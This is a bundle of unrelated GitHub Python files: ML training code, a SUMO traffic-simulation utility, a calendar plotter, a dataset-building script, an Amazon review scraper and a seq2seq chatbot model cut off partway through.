        criterion = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor([14.80], device='cuda:0'))
        optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, weight_decay=args.weight_decay, momentum=args.momentum, nesterov=True)
        model.train()
        model.to('cuda:0')
        # Full-batch gradient descent over the entire training fold.
        for epoch in range(args.no_epoch):
            optimizer.zero_grad()
            outputs = model.forward(x_train)
            loss = criterion(outputs, y_train.view(-1, 1))
            loss.backward()
            optimizer.step()
        model.eval()
        outputs = model.forward(torch.from_numpy(x_test).float().to('cuda:0'))
        logits = torch.sigmoid(outputs).detach().cpu().numpy()
        logits_all.append(logits.reshape(-1))
        labels_all.append(y_test)
        print('Iter {}/10 done'.format(counter))
        counter += 1
    logits_all = np.hstack(logits_all)
    labels_all = np.hstack(labels_all)
    # Metrics over the pooled out-of-fold predictions (threshold 0.5 via
    # np.round for the confusion-matrix-based statistics).
    tn, fp, fn, tp = confusion_matrix(labels_all, np.round(logits_all)).ravel()
    accuracy = (tp + tn) / (tp + tn + fp + fn)
    precision = tp / (tp + fp)
    sensitivity = tp / (tp + fn)
    specificity = tn / (tn + fp)
    roc_auc = roc_auc_score(labels_all, logits_all)
    prc_auc = average_precision_score(labels_all, logits_all)
    balanced_acc = balanced_accuracy_score(labels_all, np.round(logits_all))
    pos_likelihood_ratio = sensitivity / (1 - specificity)
    neg_likelihood_ratio = (1 - sensitivity) / specificity
    class_names = ['ALIVE', 'EXPIRED']  # NOTE(review): currently unused
    # Key 'specificitiy' is misspelled but kept: renaming would break any
    # existing wandb dashboards that chart it.
    wandb.log({'accuracy': accuracy, 'precision': precision, 'sensitivity': sensitivity, 'specificitiy': specificity,
               'roc_auc': roc_auc, 'prc_auc': prc_auc, 'balanced_accuracy': balanced_acc,
               'neg_likelihood_ratio': neg_likelihood_ratio, 'pos_likelihood_ratio': pos_likelihood_ratio})
| jrepifano/mortality-tool | wandb_training/d_train_wandb.py | d_train_wandb.py | py | 5,410 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
... |
8385089331 | from __future__ import absolute_import
import os
import sys
import re
import xml.dom.minidom
import random
from sumolib.files.additional import write_additional_minidom
try:
from typing import Any, List, Tuple, Union
except ImportError:
# there are python2 versions on MacOS coming without typing
pass
"""
Creates a vehicle type distribution with a number of representative car-following parameter sets.
"""
class _FixDistribution(object):
    """Degenerate 'distribution' that always yields its single fixed value;
    also the base class providing limit handling and resampling for the real
    distributions below."""
    def __init__(self, params, isNumeric=True):
        # params: tuple of distribution parameters (for this base class, a
        # 1-tuple holding the fixed value, numeric or string).
        if isNumeric:
            self._params = tuple([float(p) for p in params])
        else:
            self._params = params
        self._limits = (0, None)  # (lower, upper); None means unbounded
        self._isNumeric = isNumeric
        self._maxSampleAttempts = 10

    def setMaxSamplingAttempts(self, n):
        # None leaves the current resampling budget unchanged.
        if n is not None:
            self._maxSampleAttempts = n

    def setLimits(self, limits):
        self._limits = limits

    def sampleValue(self):
        """Draw one value: resample up to the attempt budget until it falls
        inside the limits, then clamp to the limits as a last resort."""
        if self._isNumeric:
            value = None
            nrSampleAttempts = 0
            # Sample until value falls into limits
            while nrSampleAttempts < self._maxSampleAttempts \
                    and (value is None or (self._limits[1] is not None and value > self._limits[1]) or
                         (self._limits[0] is not None and value < self._limits[0])):
                value = self._sampleValue()
                nrSampleAttempts += 1
            # Eventually apply fallback cutting value to limits
            if self._limits[0] is not None and value < self._limits[0]:
                value = self._limits[0]
            elif self._limits[1] is not None and value > self._limits[1]:
                value = self._limits[1]
        else:
            value = self._sampleValue()
        return value

    def sampleValueString(self, decimalPlaces):
        # Numeric samples are formatted to the requested precision; string
        # values are returned unchanged.
        if self._isNumeric:
            decimalPattern = "%." + str(decimalPlaces) + "f"
            return decimalPattern % self.sampleValue()
        return self.sampleValue()

    def _sampleValue(self):
        # Subclasses override this with an actual random draw.
        return self._params[0]
class _NormalDistribution(_FixDistribution):
    """Gaussian N(mu, sd)."""
    def __init__(self, mu, sd):
        _FixDistribution.__init__(self, (mu, sd))

    def _sampleValue(self):
        return random.normalvariate(self._params[0], self._params[1])


class _LogNormalDistribution(_FixDistribution):
    """Log-normal whose underlying normal has parameters mu and sd."""
    def __init__(self, mu, sd):
        _FixDistribution.__init__(self, (mu, sd))

    def _sampleValue(self):
        return random.lognormvariate(self._params[0], self._params[1])


class _NormalCappedDistribution(_FixDistribution):
    """Gaussian truncated to [min, max] by rejection sampling; the mean must
    lie inside the cutoff interval."""
    def __init__(self, mu, sd, min, max):
        _FixDistribution.__init__(self, (mu, sd, min, max))
        if mu < min or mu > max:
            raise Exception("mean %s is outside cutoff bounds [%s, %s]" % (mu, min, max))

    def _sampleValue(self):
        # Redraw until the candidate lies within [min, max].
        while True:
            cand = random.normalvariate(self._params[0], self._params[1])
            if cand >= self._params[2] and cand <= self._params[3]:
                return cand


class _UniformDistribution(_FixDistribution):
    """Uniform on [a, b]."""
    def __init__(self, a, b):
        _FixDistribution.__init__(self, (a, b))

    def _sampleValue(self):
        return random.uniform(self._params[0], self._params[1])


class _GammaDistribution(_FixDistribution):
    """Gamma(alpha, beta); beta is a rate, stored as scale 1/beta because
    random.gammavariate takes (alpha, scale)."""
    def __init__(self, alpha, beta):
        _FixDistribution.__init__(self, (alpha, 1.0 / beta))

    def _sampleValue(self):
        return random.gammavariate(self._params[0], self._params[1])


# Maps the distribution name used in config files to its implementation.
_DIST_DICT = {
    'normal': _NormalDistribution,
    'lognormal': _LogNormalDistribution,
    'normalCapped': _NormalCappedDistribution,
    'uniform': _UniformDistribution,
    'gamma': _GammaDistribution
}
class VehAttribute:

    def __init__(self, name, is_param=False, distribution=None, distribution_params=None,
                 bounds=None, attribute_value=None):
        # type: (str, bool, str, Union[dict, Any], tuple, str) -> None
        """
        This emulates one line of example config.txt in
        https://sumo.dlr.de/docs/Tools/Misc.html#createvehtypedistributionpy
        Either distribution or attribute_value should be populated
        Args:
            name (str): the name of the attribute. Examples: "tau", "sigma", "length"
            is_param (bool, optional): is the attribute a parameter that should be added as a child element.
            distribution (str, optional): the name of the distribution to use ()
            distribution_params (Union[dict, Any], optional): the parameters corresponding to the distribution
            bounds (tuple, optional): the bounds of the distribution.
            attribute_value (str, optional): if no distribution is given, the fixed value for the attribute
        """
        self.is_param = is_param
        self.name = name
        self.distribution = distribution
        self.distribution_params = distribution_params
        self.bounds = bounds
        self.attribute_value = attribute_value
        if self.attribute_value and self.distribution:
            raise Exception("Only one of distribution or attribute value should be defined, not both")
        self.d_obj = self._dist_helper(distribution, distribution_params, bounds)

    def _dist_helper(self, distribution, dist_params, dist_bounds):
        # type: (...) -> Union[None, _FixDistribution]
        """Instantiate the named distribution (bounds default to (0, None)),
        or wrap the fixed attribute value when no distribution is given."""
        if distribution:
            try:
                d = _DIST_DICT[distribution](**dist_params)
                d.setLimits(dist_bounds) if dist_bounds else d.setLimits(
                    (0, None))
            except KeyError:
                raise KeyError("The distribution %s is not known. Please select one of: \n%s " %
                               (distribution, "\n".join(_DIST_DICT.keys())))
        else:
            # emissionClass is inherently textual; any other attribute counts
            # as numeric only if its value looks like a plain decimal number.
            isNumeric = False if self.name == "emissionClass" else len(
                re.findall(r'^(-?[0-9]+(\.[0-9]+)?)$', self.attribute_value)) > 0
            d = _FixDistribution((self.attribute_value, ), isNumeric)
        return d

    def add_sampling_attempts(self, attempts):
        # Propagate the distribution-wide resampling budget to this attribute.
        if self.d_obj:
            self.d_obj.setMaxSamplingAttempts(attempts)
class CreateVehTypeDistribution:
    def __init__(self, seed=None, size=100, name='vehDist', resampling=100, decimal_places=3):
        # type: (int, int, str, int, int) -> None
        """
        Creates a VehicleType Distribution.
        See https://sumo.dlr.de/docs/Definition_of_Vehicles,_Vehicle_Types,_and_Routes.html#vehicle_type_distributions
        Args:
            seed (int, optional): random seed.
            size (int, optional): number of vTypes in the distribution.
            name (str, optional): alphanumerical ID used for the created vehicle type distribution.
            resampling (int, optional): number of attempts to resample a value until it lies in the specified bounds.
            decimal_places (int, optional): number of decimal places.
        """
        # Bug fix: the old 'if seed:' silently ignored the perfectly valid
        # seed 0; only skip seeding when no seed was supplied at all.
        if seed is not None:
            random.seed(seed)
        self.size = size
        self.name = name
        self.resampling = resampling
        self.decimal_places = decimal_places
        self.attributes = []  # type: List[VehAttribute]
    def add_attribute(self, attribute):
        # type: (Union[VehAttribute, dict]) -> None
        """
        Add an instance of the attribute class to the Parameters. Pass the sampling attempts "global" parameter
        Args:
            attribute (VehAttribute or dict): An instance of VehAttribute or
             a dictionary of parameters to be passed to the VehAttribute constructor
        """
        attribute = attribute if isinstance(attribute, VehAttribute) else VehAttribute(**attribute)
        attribute.add_sampling_attempts(self.resampling)
        self.attributes.append(attribute)
    def create_veh_dist(self, xml_dom):
        # type: (xml.dom.minidom.Document) -> xml.dom.minidom.Element
        """Create a <vTypeDistribution> element holding `size` sampled <vType> children."""
        # create the vehicleDist node
        vtype_dist_node = xml_dom.createElement("vTypeDistribution")
        vtype_dist_node.setAttribute("id", self.name)
        # create the vehicle types
        for i in range(self.size):
            veh_type_node = xml_dom.createElement("vType")
            veh_type_node.setAttribute("id", self.name + str(i))
            self._generate_vehType(xml_dom, veh_type_node)
            vtype_dist_node.appendChild(veh_type_node)
        return vtype_dist_node
    def to_xml(self, file_path):
        # type: (str) -> None
        """Write the distribution to `file_path`, merging into the file if it exists."""
        xml_dom, existing_file = self._check_existing(file_path)
        vtype_dist_node = self.create_veh_dist(xml_dom)
        if existing_file:
            self._handle_existing(xml_dom, vtype_dist_node)
            with open(file_path, 'w') as f:
                dom_string = xml_dom.toprettyxml()
                # super annoying but this makes re-writing the xml a little bit prettier
                f.write(os.linesep.join([s for s in dom_string.splitlines() if s.strip()]))
        else:
            write_additional_minidom(xml_dom, vtype_dist_node, file_path=file_path)
        sys.stdout.write("Output written to %s" % file_path)
    def _handle_existing(self, xml_dom, veh_dist_node):
        # type: (xml.dom.minidom.Document, xml.dom.minidom.Element) -> None
        """Replace an existing distribution with the same id, otherwise append."""
        existingDistNodes = xml_dom.getElementsByTagName("vTypeDistribution")
        replaceNode = None
        for existingDistNode in existingDistNodes:
            if existingDistNode.hasAttribute("id") and existingDistNode.getAttribute("id") == self.name:
                replaceNode = existingDistNode
                break
        if replaceNode is not None:
            replaceNode.parentNode.replaceChild(veh_dist_node, replaceNode)
        else:
            xml_dom.documentElement.appendChild(veh_dist_node)
    def _generate_vehType(self, xml_dom, veh_type_node):
        # type: (xml.dom.minidom.Document, xml.dom.minidom.Element) -> xml.dom.minidom.Node
        """Sample every registered attribute into the given <vType> node.

        Parameter-type attributes become <param> children; plain attributes
        are written directly on the <vType> element.
        """
        for attr in self.attributes:
            if attr.is_param:
                param_node = xml_dom.createElement("param")
                param_node.setAttribute("key", attr.name)
                param_node.setAttribute(
                    "value", attr.d_obj.sampleValueString(self.decimal_places))
                veh_type_node.appendChild(param_node)
            else:
                veh_type_node.setAttribute(
                    attr.name, attr.d_obj.sampleValueString(self.decimal_places))
    @staticmethod
    def _check_existing(file_path):
        # type: (str) -> Tuple[xml.dom.minidom.Document, bool]
        """Return (parsed document, True) for an existing file, else (empty document, False)."""
        if os.path.exists(file_path):
            try:
                return xml.dom.minidom.parse(file_path), True
            except Exception as e:
                raise Exception("Cannot parse existing %s. Error: %s" %
                                (file_path, str(e)))
        else:
            return xml.dom.minidom.Document(), False
    def save_myself(self, file_path):
        # type: (str) -> None
        """
        This function saves the class to a json format. Used for logging simulation inputs
        Args:
            file_path (str): path to save json to
        """
        import json
        with open(file_path, "w") as f:
            f.write(
                json.dumps(
                    self,
                    default=lambda o: {
                        key: param for key, param in o.__dict__.items() if '_' not in key[0]},
                    sort_keys=True,
                    indent=4,
                )
            )
class CreateMultiVehTypeDistributions(CreateVehTypeDistribution):
    # Container for several vehicle-type distributions written to one file.
    # NOTE(review): the base-class __init__ is deliberately not called here;
    # per-distribution parameters live on the registered children instead.
    def __init__(self):
        # type: () -> None
        self.distributions = []  # type: List[CreateVehTypeDistribution]
    def register_veh_type_distribution(self, veh_type_dist, veh_attributes):
        # type: (Union[dict, CreateVehTypeDistribution], List[Union[dict, VehAttribute]]) -> None
        # Accept either ready-made objects or plain dicts of constructor kwargs.
        veh_type_dist = veh_type_dist if isinstance(
            veh_type_dist, CreateVehTypeDistribution) else CreateVehTypeDistribution(**veh_type_dist)
        for attr in veh_attributes:
            veh_type_dist.add_attribute(attr if isinstance(attr, VehAttribute) else VehAttribute(**attr))
        self.distributions.append(veh_type_dist)
    def write_xml(self, file_path):
        # type: (str) -> None
        """
        This function will overwrite existing files
        Args:
            file_path (str): Path to the file to write to
        """
        xml_dom, _ = self._check_existing(file_path)
        veh_dist_nodes = [dist.create_veh_dist(xml_dom=xml_dom) for dist in self.distributions]
        write_additional_minidom(xml_dom, veh_dist_nodes, file_path=file_path)
| ngctnnnn/DRL_Traffic-Signal-Control | sumo-rl/sumo/tools/sumolib/vehicletype.py | vehicletype.py | py | 12,625 | python | en | code | 17 | github-code | 6 | [
{
"api_name": "random.normalvariate",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "random.lognormvariate",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "random.normalvariate",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "rando... |
314473279 |
import os
from util.IO import IO
from util.Event import Event
import matplotlib.pyplot as plt
from matplotlib import rc
import numpy as np
from datetime import date, timedelta, datetime
import pandas as pd
class Calendar:
    """Renders a 7-day schedule (matplotlib figure) for a user's events."""
    def __init__(self, username):
        self.usernames = username
        io = IO(self.usernames)
        # Keep a live DB connection for request/user lookups in plotEvents.
        self.mysql = io.dbConnect()
    def plotEvents(self, today, defaultUserName=None):
        '''
        defaultUserName : the current user
        '''
        otherEvents = []
        if defaultUserName != None:
            # NOTE(review): user-supplied names are interpolated straight into
            # SQL via f-strings here and below -- SQL-injection risk; switch to
            # parameterized queries (driver `params=`) when touching this code.
            query = f"""
            SELECT *
            FROM REQUESTS
            WHERE Requestor != '{defaultUserName}'
            """
            reqTable = pd.read_sql(query, self.mysql)
            for ii, row in reqTable.iterrows():
                event = Event(row['Requestor'], row['EventName'], row['StartTime'], row['EndTime'], row['StartDate'])
                otherEvents.append(event)
        # colors[0] = own events, colors[1] = other users' requests.
        colors = ['firebrick', 'dodgerblue', 'seagreen']
        colorIdx = 0
        #raise ValueError('made it')
        fig, axs = plt.subplots(1, 7, figsize=(30, 15))
        # get new ioObj
        io = IO(self.usernames)
        # generate list of next 7 days
        datesList = [today + timedelta(days=i) for i in range(7)]
        # generate plot of the users schedule for the next 7 days
        strTimes = [f"{ii}:00" for ii in range(24)]
        axs[0].set_ylabel('Time [hh:mm]', fontsize=30)
        # x spans the full axis width for fill_between/axhline calls below.
        x = [0, 1]
        placeTicks = True
        for ax, dd in zip(axs, datesList):
            ax.set_title(dd.strftime("%m/%d"), fontsize=24)
            ax.set_xticks([])
            ax.set_yticks([])
            # NOTE(review): set_ylim(24) sets only the bottom limit -- confirm
            # this produces the intended (inverted?) time axis.
            ax.set_ylim(24)
            for jj in range(24):
                ax.axhline(jj, x[0], x[1], ls='--', color='k', alpha=0.5)
            # Own events (presumably loaded by IO; verify io.events population).
            for event in io.events:
                if event.startTime.strftime("%m/%d") == dd.strftime("%m/%d"):
                    startHr = int(event.startTime.strftime("%H"))
                    startMin = int(event.startTime.strftime("%M"))
                    endHr = int(event.endTime.strftime("%H"))
                    endMin = int(event.endTime.strftime("%M"))
                    ax.fill_between(x, startHr + startMin/60, endHr + endMin/60, color=colors[0], alpha=0.5)
                    midpoint = (startHr + startMin/60 + endHr + endMin/60)/2
                    ax.text(0, midpoint, event.eventName, color='w', fontsize=24)
            # Other users' requested events, annotated with the requester name.
            for event in otherEvents:
                if event.startTime.strftime("%m/%d") == dd.strftime("%m/%d"):
                    startHr = int(event.startTime.strftime("%H"))
                    startMin = int(event.startTime.strftime("%M"))
                    endHr = int(event.endTime.strftime("%H"))
                    endMin = int(event.endTime.strftime("%M"))
                    ax.fill_between(x, startHr + startMin/60, endHr + endMin/60, color=colors[1], alpha=0.5)
                    midpoint = (startHr + startMin/60 + endHr + endMin/60)/2
                    ax.text(0, midpoint, event.eventName, color='w', fontsize=24)
                    cursor = self.mysql.cursor()
                    # get other User name
                    getNames = f"""
                    SELECT *
                    FROM USERNAME
                    WHERE UserName='{event.userName}'
                    """
                    userInfo = pd.read_sql(getNames, self.mysql)
                    first = userInfo['FirstName'].tolist()[0]
                    last = userInfo['LastName'].tolist()[0]
                    ax.text(0, midpoint+1, first+" "+last, color='w', fontsize=24)
            # Hour labels only on the left-most axis.
            if placeTicks:
                ax.set_yticks(np.arange(len(strTimes)), labels=strTimes, fontsize=24)
                placeTicks=False
            else:
                ax.set_yticks(np.arange(len(strTimes)), labels="", fontsize=24)
        fig.suptitle("Year: " + datesList[0].strftime("%Y"), fontsize=36)
        return fig
| noahfranz13/IOU | util/Calendar.py | Calendar.py | py | 4,071 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "util.IO.IO",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.read_sql",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "util.Event.Event",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplot... |
36108675828 | from calendar import weekday
import os
import zipfile
import numpy as np
import torch
import sklearn.metrics as metrics
import matplotlib.pyplot as plt
# Build the "bravoplus" node-value tensor: bravo's junctions plus junction 196
# (channels 2..4 of alpha), then save and optionally zip the result.
# if dataset == "alpha":
#     if (not os.path.isfile("DC_STGCN/data/adj_mat_alpha.npy")
#             or not os.path.isfile("DC_STGCN/data/node_values_alpha.npy")):
with zipfile.ZipFile("DC_STGCN/data/SCATS_alpha.zip", 'r') as zip_ref:
    zip_ref.extractall("DC_STGCN/data/")
# Loaded as (time, junc, chan); transpose to (junc, chan, time) for slicing.
X_alpha = np.load("DC_STGCN/data/alpha_data/node_values_alpha.npy").transpose((1, 2, 0))
X_alpha = X_alpha.astype(np.float32)
# elif dataset == "bravo":
#     if (not os.path.isfile("DC_STGCN/data/adj_mat_bravo.npy")
#             or not os.path.isfile("DC_STGCN/data/node_values_bravo.npy")):
with zipfile.ZipFile("DC_STGCN/data/SCATS_bravo.zip", 'r') as zip_ref:
    zip_ref.extractall("DC_STGCN/data/")
# A = np.load("DC_STGCN/data/bravo_data/adj_mat_bravo.npy")
# A = A.astype(np.float32)
X_bravo = np.load("DC_STGCN/data/bravo_data/node_values_bravo.npy").transpose((1, 2, 0))
X_bravo = X_bravo.astype(np.float32)
print(X_alpha.shape)
print(X_bravo.shape)
# Rows 2..4 of alpha -- presumably junction 196's channels; confirm indices.
X_196 = X_alpha[2:5, :, :]
print(X_196.shape)
# Append the extra junctions to bravo along the junction axis.
X_bravoplus = np.concatenate((X_bravo, X_196), axis=0)
print(X_bravoplus.shape)
# Back to (time, junc, chan) for saving.
X_bravoplus = X_bravoplus.transpose((2, 0, 1))
np.save("interpret_csv_bravoplus/node_values_bravoplus", X_bravoplus)
files_string = "TO BE CONFIGURED"
f = open("interpret_csv_bravoplus/nv_info.txt", "w")
# 480 samples per day (hard-coded cadence -- verify against source data).
info_string = "Num Juncs:\t" + str(X_bravoplus.shape[1]) + "\nNum Channels:\t" + str(X_bravoplus.shape[2]) + "\nNum Days:\t" + str(X_bravoplus.shape[0]/480)
print(info_string)
f.write(info_string)
f.write(files_string)
f.close()
# Only bundle the zip once the adjacency matrix and its info file also exist.
if os.path.isfile("interpret_csv_bravoplus/adj_mat_bravoplus.npy") and os.path.isfile("interpret_csv_bravoplus/adj_info.txt"):
    with zipfile.ZipFile("interpret_csv_bravoplus/SCATS_bravoplus.zip", "w") as zip_object:
        zip_object.write("interpret_csv_bravoplus/node_values_bravoplus.npy", arcname="bravoplus_data/node_values_bravoplus.npy")
        zip_object.write("interpret_csv_bravoplus/adj_mat_bravoplus.npy", arcname="bravoplus_data/adj_mat_bravoplus.npy")
        zip_object.write("interpret_csv_bravoplus/adj_info.txt", arcname="bravoplus_data/adj_info.npy")
        zip_object.write("interpret_csv_bravoplus/nv_info.txt", arcname="bravoplus_data/nv_info.npy")
print("Zipped") | oscarcrowley1/thesis | interpret_csv_bravoplus/make_bravoplus_tensor.py | make_bravoplus_tensor.py | py | 2,378 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "zipfile.ZipFile",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "zipfile.ZipFile",
"... |
38902490932 | import scrapy
from sanic.log import logger
reviews_tag_identifier = "//span[@data-hook='review-body']/span/text()"
next_page_tag_identifier = "//li[@class='a-last']/a/@href"
class AmazonSpider(scrapy.Spider):
    """Scrapes all review texts for one ASIN from amazon.in, following
    pagination, and yields a single summary item at the end."""
    name = 'amazon_spider'
    allowed_domains = ['amazon.in']
    def __init__(self, name=None, uid=None, asin=None):
        super().__init__(name)
        # asin is mandatory -- it forms the start URL.
        if not asin:
            logger.warning('| amazon spider | asin param was null - it should not be null')
            raise Exception('asin should not be null')
        self.asin = asin
        self.uid = uid
        self.start_urls = [
            f'https://www.amazon.in/product-reviews/{asin}'
        ]
        # Accumulates review strings across paginated parse() calls.
        self.reviews = []
        # NOTE(review): base_url is never read and points at google.com --
        # confirm whether it can be removed.
        self.base_url = 'https://www.google.com'
    def parse(self, response, **kwargs):
        # Collect review bodies from this page, then either follow the
        # "next page" link or emit the aggregated result.
        logger.info('| amazon spider | started parsing the reviews')
        reviews_dom = response.xpath(reviews_tag_identifier)
        if reviews_dom:
            for review in reviews_dom:
                self.reviews.append(
                    review.get()
                )
        else:
            logger.warning('| amazon spider | No reviews element in the html page')
        next_page = response.xpath(next_page_tag_identifier).get()
        if next_page:
            yield scrapy.Request(
                response.urljoin(next_page), self.parse
            )
        else:
            # Last page reached: yield one item carrying all reviews.
            yield {
                'meta-data': {
                    'uid': self.uid,
                    'asin': self.asin,
                    'is_preprocessed': False,
                    'total_reviews': len(self.reviews),
                },
                'reviews': self.reviews
            }
| Mahi-developer/review-analyzer | app/scrapper/spiders/amazon_spider.py | amazon_spider.py | py | 1,683 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "scrapy.Spider",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sanic.log.logger.warning",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sanic.log.logger",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "sanic.log... |
27661384502 | import torch
import torch.nn as nn
import torch.nn.functional as F
import random
from base import BaseModel
class Encoder(nn.Module):
    """Sequence encoder: token ids -> embeddings -> GRU hidden states.

    Vocabulary and embedding sizes are taken from the supplied embedding
    wrapper object; the embedding table itself is freshly initialised.
    """

    def __init__(self, embedding, hidden_size, rnn_cell='GRU', bidirectional=False, n_layers=1, dropout=0.0, device='cpu'):
        super().__init__()
        self.hidden_size = hidden_size
        self.rnn_cell = rnn_cell
        #self.padding_idx = self.embedding.to_index(padding)
        self.bidirectional = bidirectional
        self.n_layers = n_layers
        self.dropout = dropout
        self.device = device
        # Number of initial hidden-state slots: doubled for bidirectional RNNs.
        self.n_init = n_layers * (2 if bidirectional else 1)
        self.vocab_size = embedding.vocab_size
        self.emb_size = embedding.emb_size
        self.embedding = nn.Embedding(self.vocab_size, self.emb_size)
        #self.embedding.weight = nn.Parameter(embedding.vectors)
        if rnn_cell == 'GRU':
            self.rnn = nn.GRU(self.emb_size, self.hidden_size, batch_first=True,
                              dropout=self.dropout, num_layers=self.n_layers)
        #self.freeze_embedding()

    def freeze_embedding(self):
        """Stop gradient updates for the embedding table."""
        for weight in self.embedding.parameters():
            weight.requires_grad = False

    def forward(self, source):
        """Encode a batch of token-id sequences.

        Args:
            source: (batch, seq_len) long tensor of token indices.
        Returns:
            output: (batch, seq_len, hidden_size) per-step states.
            hidden: (n_layer*n_direction, batch, hidden_size) final state.
        """
        embedded = self.embedding(source)
        # hx=None lets the GRU start from a zero hidden state.
        output, hidden = self.rnn(embedded, None)
        return output, hidden
class Decoder(nn.Module):
    """Recurrent decoder with optional attention and scheduled teacher forcing.

    NOTE(review): forward() mutates `self.step` on every call and, once the
    step counter exceeds 2000, overwrites `teaching_force_rate` with 0.2 --
    confirm this warm-up schedule is intentional before refactoring.
    """
    def __init__(self, embedding, hidden_size, rnn_cell='GRU', bidirectional=False, n_layers=1, dropout=0.2, device='cpu', teaching_force_rate=0.0, use_attn=False, method=None, padded_len=None):
        super(Decoder, self).__init__()
        self.hidden_size = hidden_size
        self.rnn_cell = rnn_cell
        self.bidirectional = bidirectional
        self.n_layers = n_layers
        self.dropout = dropout
        self.device = device
        # Hidden-state slots: doubled for bidirectional RNNs.
        self.n_init = (2 if bidirectional == True else 1) * n_layers
        self.teaching_force_rate = teaching_force_rate
        self.vocab_size = embedding.vocab_size
        self.emb_size = embedding.emb_size
        self.use_attn = use_attn
        # Forward-call counter driving the teacher-forcing schedule.
        self.step = 0
        self.relu = nn.ReLU()
        self.softmax = nn.LogSoftmax(dim=-1)
        # Keep the original embedding wrapper for debug decoding (see
        # commented-out indice_to_sentence calls below).
        self.embedding_org = embedding
        self.embedding = nn.Embedding(self.vocab_size, self.emb_size)
        #self.embedding.weight = nn.Parameter(embedding.vectors)
        self.linear = nn.Linear(self.hidden_size, self.vocab_size)
        if rnn_cell == 'GRU': self.rnn = nn.GRU(self.emb_size, self.hidden_size, batch_first=True, dropout=self.dropout, num_layers=self.n_layers)
        if self.use_attn:
            self.attn = Attention(hidden_size=self.hidden_size, method=method, padded_len=padded_len)
        #self.freeze_embedding()
    def freeze_embedding(self):
        # Stop gradient updates for the embedding table.
        for param in self.embedding.parameters():
            param.requires_grad = False
    def forward(self, label, init_hidden, encoder_output=None):
        # After 2000 calls, force a fixed 0.2 teacher-forcing rate.
        if(self.step > 2000): self.teaching_force_rate = 0.2
        self.step += 1
        # Decide per batch whether to feed ground-truth tokens (teacher
        # forcing) or the decoder's own previous predictions.
        use_teaching_force = True if random.random() <= self.teaching_force_rate else False
        # source: (batch, seq_len)
        #input = self.relu(self.embedding(input)) # (batch, seq_len) -> (batch, seq_len, emb_size)
        batch, seq_len = label.size(0), label.size(1)
        outputs = []
        hidden = init_hidden
        if use_teaching_force:
            # Teacher forcing: each time step consumes the gold token.
            for i in range(seq_len):
                input = label[:, i].unsqueeze(1)
                #print(label)
                #print(str(i) + ': ' + self.embedding_org.indice_to_sentence(label[0].tolist()))
                input = self.relu(self.embedding(input))
                if self.use_attn:
                    attn_output = self.attn(encoder_output, input, hidden)
                    output, hidden = self.rnn(attn_output, hidden)
                else:
                    output, hidden = self.rnn(input, hidden)
                output = self.softmax(self.linear(output))
                last_predict = output.max(2)[1]
                #print(str(i) + ': ' + self.embedding_org.indice_to_sentence(last_predict[0].tolist()))
                outputs.append(output)
        else:
            # Free-running: seed with the first gold token, then feed back
            # the argmax prediction at each step.
            input = label[:, 0].unsqueeze(1)
            input = self.relu(self.embedding(input))
            for i in range(seq_len):
                if self.use_attn:
                    attn_output = self.attn(encoder_output, input, hidden)
                    output, hidden = self.rnn(attn_output, hidden)
                else:
                    output, hidden = self.rnn(input, hidden)
                output = self.softmax(self.linear(output))
                outputs.append(output)
                last_predict = output.max(2)[1]
                input = self.relu(self.embedding(last_predict))
        # (batch, seq_len, vocab_size) log-probabilities.
        outputs = torch.cat(outputs, dim=1)
        return outputs
class Attention(nn.Module):
    """Concat-style attention: scores encoder positions from the current
    decoder input and hidden state, then mixes the attended context back
    into the decoder input.

    Args:
        hidden_size: decoder hidden size (must equal the embedding size).
        method: scoring-method name (stored but currently unused).
        padded_len: fixed encoder sequence length the scores are produced for.
    """
    def __init__(self, hidden_size, method, padded_len):
        super(Attention, self).__init__()
        self.hidden_size = hidden_size
        self.method = method
        self.attn = nn.Linear(hidden_size*2, padded_len)
        self.attn_combine = nn.Linear(hidden_size*2, hidden_size)
        # Bug fix: nn.Softmax() without `dim` falls back to PyTorch's legacy
        # dim inference, which selects dim 0 for a 3-D input -- normalising
        # over the *batch* instead of over the attention scores. Normalise
        # over the last (padded_len) axis explicitly.
        self.softmax = nn.Softmax(dim=-1)
        self.relu = nn.ReLU()
    def forward(self, encoder_output, decoder_input_embeded, decoder_hidden):
        # encoder_output: [batch, seq_len, hidden_size=embedded_size]
        # decoder_input_embeded: [batch, 1, embedded_size]
        # decoder_hidden: [batch, 1, embedded_size] after the permute below
        decoder_hidden = decoder_hidden.permute(1, 0, 2)
        # Score each encoder position from the concatenated input + hidden.
        similarity = self.attn(torch.cat((decoder_input_embeded, decoder_hidden), dim=-1))
        attn_weight = self.softmax(similarity)  # [batch, 1, padded_len]
        # Weighted sum of encoder states -> context vector.
        attn_applied = torch.bmm(attn_weight, encoder_output)  # [batch, 1, hidden_size]
        # Fuse context with the decoder input for the RNN step.
        output = self.relu(self.attn_combine(torch.cat((attn_applied, decoder_input_embeded), dim=-1)))
        return output
class ChatBotModel(BaseModel):
    """Seq2seq chatbot: the Encoder's final hidden state initialises the Decoder.

    When attention is enabled, the hidden size is forced to the embedding
    size so encoder outputs and decoder inputs can be concatenated directly.
    """
    def __init__(self, embedding, hidden_size, rnn_cell='GRU', bidirectional=False, n_layers=1, dropout=0.2, device='cpu', teaching_force_rate=0.0, use_attn=False, method='concat', padded_len=10):
        super().__init__()
        self.use_attn = use_attn
        self.embedding = embedding
